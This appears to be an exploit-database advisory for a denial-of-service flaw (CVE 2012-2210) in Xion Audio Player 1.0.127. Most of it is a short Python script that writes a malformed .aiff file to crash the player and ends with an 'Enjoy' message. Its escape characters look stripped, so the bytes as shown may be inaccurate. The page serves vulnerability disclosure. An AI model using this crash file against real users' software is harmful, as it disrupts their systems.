Xion Audio Player 1.0.127 (.aiff) Denial of Service Exploit

Summary

Xion Audio Player 1.0.127 (.aiff) suffers from denial of service vulnerability

Credit:

The information has been provided by Julien Ahrens.
The information has been provided by condis.


Details

Vulnerable Systems:
 * Xion Audio Player 1.0.127

evil = ‘FORMx00x00x37xA4AIFFCOMM’
evil += ‘A’ # <— crash (rest of the file doesn’t matters)

aiff = open(‘xion-crash.aiff’, ‘w’)
aiff.write(evil)
aiff.close()

print ‘Malicious .aiff file has been created. Enjoy’

CVE Information:
2012-2210

Disclosure Timeline:
Published: 2012-04-04

Categories: Exploits